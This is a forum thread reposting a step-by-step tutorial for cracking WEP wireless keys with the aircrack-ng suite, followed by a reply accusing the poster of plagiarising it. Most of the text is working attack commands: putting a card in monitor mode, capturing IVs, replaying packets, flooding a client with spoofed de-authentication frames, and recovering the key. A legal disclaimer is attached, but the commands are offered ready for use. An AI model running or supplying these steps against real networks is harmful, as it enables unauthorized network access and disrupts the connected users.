View Profile
View Forum Posts
Private Message
Cracking WEP Key
Analysis, Approach & Attack
By Saurabh Harit
well this is a tut ive had stored on my comp and i made a while back for a few people that requested it at a differant site.( ____________.com)
i dont want to post the site unless i get the ok from an admin or mod.
Note: This tut is for learning purpose and to make administrators aware of weakness in WEP. It is illegal to perform such attacks on the network which is not owned by you. I will not be responsible for any kind of damage caused by you after reading this tut....sorry guys I had to write this...
Let's get started....
Introduction:
This access point is configured to connect securely with the various legitimate clients using 64 / 128 bit WEP encryption key. In field scenario, once an attacker gains access to this WEP key, he/she will gain privilege to authenticate himself/herself with the access point. This will open door for many other wireless attacks. Some of them are as follows,
1) Physical Layer Attacks or Jamming
2) Spoofed Dissociation and De-authentication Frames Floods
3) Spoofed Malformed Authentication Frame Attack
4) Filling Up the Access Point Association and Authentication Buffers
5) Frame Deletion Attack
6) DoS Attacks Based on Specific Wireless Network Settings
7) Attacks Against 802.11i Implementations
Approach
Hardware Requirements:
Here is a list of required hardware,
1) Wireless Access Point this will be the target access point.
2) Two laptops Machine1 and Machine2. Machine1 is attacker’s machine and Machine2 is a legitimate user who can connect to the access point using WEP network key. Machine1 has no clue about the WEP network key of the access point.
3) A wireless network card. We used Netgear’s WPN 511 pcmcia card for Machine1. This card comes with Atheros chipset and has packet injection capabilities. Machine2 has an inbuilt wireless network card.
Software Requirements:
Here is a list of required software,
1) Airodump-ng
2) Aireplay-ng
3) Aircrack-ng
Airodump-ng is used to sniff the wireless traffic. It will help us locate our access point and the client connected with it. It will also show us details like operating channel, data rate, beacons, encryption type etc.
Aireplay-ng is used to replay data packets to access points and clients. This technique is used to increase the data transfer rate between the access point and client in order to generate more IVs. More than 20,000 IVs are required to break the 64 bit WEP key and more than 70,000 IVs are required to break the 128 bit WEP key. Without implementing this technique, the attack becomes very slow.
Aircrack-ng is used to crack the WEP keys once we have sufficient IVs.
First of all, we need to configure the access point and client. Once the configuration is done we can leave them and go back to attack machine to break the WEP key implemented by the access point.
The first step is to configure a wireless network between the access point and the client laptop i.e. Machine2. This network will be secured with WEP key that we need to crack. Assign an SSID to your access point. Configure a 64 / 128 bit key.
Information gathering:
We would require following information to perform the attack,
1) MAC address of access point.
2) SSID of access point.
3) Wireless channel of access point.
4) MAC address of client associated with access point.
Setup Machine1 (Attack machine):
Insert the pcmcia wireless network card and boot the machine. Check the configurations using the following commands.
iwconfig
By default, as in my case, you will see only one interface i.e. ath0. You will have to create a new wifi interface and put it to monitor mode. Use the following command:
wlanconfig ath1 create wlandev wifi0 wlanmode monitor
This will give you your wireless interface with name ath1 which will operate in monitor mode.
ifconfig ath1 up
This will start the wireless network card.
If you want to use the existing interface i.e. ath0, use the following command to put it in monitor mode.
ifconfig ath0 mode Monitor
This command will put the card in Monitor mode. This is important for passive listening and packet injection (+ your wireless network card should have packet injection capabilities).
Use the following command to verify if your card is ready to sniff the wireless traffic.
Iwlist ath1 scan
Attack
Following text describes the real attack which I performed on setup to crack the WEP encryption key.
Start airoudmp by typing the following command on your bash prompt,
airodump-ng –write data --ivs --band abg ath1
The above command will start airodump and will start sniffing wireless traffic. The different parameters are detailed below,
--write will write out the data to a file with name “data”. Every time you specify the same output file name, such as "data", airodump-ng will append the file name with "-##" such as data-01.ivs, data-02.ivs, etc.
--ivs will capture only Initialization vectors
--band will search for bands a,b and g
Your screen will be divided into two parts. The upper half will display the access points and the lower half will display the clients. Find your access point in the upper half of the screen and note down the MAC address or BSSID, ESSID and channel on which it is operating. We would require this information. Our aim is to collect as many IVs as possible. Every time data is exchanged between the access point and the associated client, each data packet will contain an IV. These IVs will then be fed to aircrack, in order to crack the WEP key.
Although, you will notice that tons of numbers (beacons) are flying by, but the data is not updating very quickly. This is because airodump is searching all the channels. From upper half of the screen, we can find out the channel on which our access point is operating. In my case, it was 11. Abort airodump and re-run it to sniff on specific channel. Use the following command,
airodump-ng --channel 11–write data --ivs –band abg ath1
Airodump will start running at much faster rate now and updating the data constantly. You will see a number rising very quickly, this is generally the beacons. Beacons just basically say "hey, i'm an access point" about 10 times a second. You can judge the quality of your connection by how frequently the beacon rises. Other than this, they are useless for our purposes. For this type of attack it is important for there to be a client connected to the access point. So connect machine2 to the access point wirelessly using the WEP encryption key. In airodump, you should see at the bottom a client pop up, the first MAC is the access point and the 2nd is the Client associated with it. Write down the MAC address or BSSID of the client.
Open a new bash prompt and type the following command,
aireplay-ng -2 -b APmac -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h CLmac ath1
where APmac is the MAC address of the access point and CLmac is the MAC address of the client i.e. Machine2, in our case. –d parameter is used for broadcasting the data. Aireplay will now start sniffing for a certain type of packet with a length no more and no less than 68 bytes between client and access point. It will display- “Read ### packets". At this point, if there is significant data transfer between the client and access point, it will pull the right packet and will prompt you to use it. In this case, hit Y to use the packet and skip the next step. If however, it keeps reading packets for a while (more than a couple min) and does not pop up saying "Use this packet?" then open a new bash prompt and type the following command,
aireplay-ng -0 15 -a APmac -c CLmac ath1
The above command will send out 15 de-authentication packets to the client spoofing the identity of access point. So the client will think that the packets are coming from the legitimate access point and will disconnect itself from the wireless network and will try to re-connect after a while. It is this re-connection packet that we are trying to sniff.
Note: The normal data exchange rate between the access point and the client is not very fast. Collecting enough IVs at this rate to crack WEP keys will consume a lot of time. So we need to fasten up the process. This is done by sending data packets to access point at a faster rate. If the packet is valid and the access point think that the packet is coming from the legitimate client, it will send back the reply which will also contain the IV. We get a valid packet when the client tries to re-connect to the access point. Aireplay then uses this packet to flood access point spoofing its identity with the legitimate client.
Go back to first instance of aireplay and you should see something at the bottom of screen saying – “Use this packet”. Hit ‘y’ and aireplay will flood the access point with this packet. Switch back to airodump and you should see the data rate going up significantly.
If aireplay had picked up any more packets, it will prompt you again if you want to use them. Try more packets. Also, you may need to get closer to your access point or try the aireplay-ng -0 method again. Experiment with it. Once you've got the data rate going up quickly, start aircrack-ng to crack the WEP keys. Type in the following command,
aircrack-ng -f 2 -a 1 -b APmac -n 64 data-01.ivs
-n parameter could be 64 or 128 depending on the length of WEP key you have set in access point. Aircrack will scan the keys collected and will analyze the IVs. After a while of analysis, it will spit out the WEP encryption key.
Boom....The WEP encryption key has been successfully cracked...
just dont be stupid once u do this. it may lead to some serious stuff.
oh one more thing i forgot to add,
about aircrack for you People who dont understand... Its not compatible with most Network Cards, Not compatible with most Network Drivers, not compatible with Internal wifi drivers, only works for wireless cards that have Raw Monitoring Mode(monitor packets through the card)... Best to be ran on a Linux machine, so try and look up Dualbooting Linux with your OS. The linux version does not work with PSPLinux(for you people who would try.
(oh and i also started working on a port for PSP. and was able to get most of it working, but for some odd reason when it finished the attack the WEP code was still encrypted.(PSP Internal wifi does Monitor packets by default(But The linux version doesnt detect the driver)(So i ported it to PSP, took all features off except a few, was easy to detect the internal wifi driver).
Closed Thread
Results 1 to 2 of 2
Thread: cracking a WEP Key
-
07-13-2008 #1
- Join Date
- Feb 2008
- Posts
- 20
- Points
- 41,015.88
- Rep Power
- 210
cracking a WEP Key
Last edited by SonniE; 07-17-2008 at 10:27 PM.
-
07-14-2008 #2
- Join Date
- Jan 2008
- Location
- Florida
- Posts
- 1,383
- Points
- 1,377,894.65
- Rep Power
- 216
Ugh, this is starting to get really annoying.
Originally Posted by oneshotkill
http://www.elitehackers.info/forums/...ad.php?p=67039
Hmmm....I don't think you're " Saurabh Harit"
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts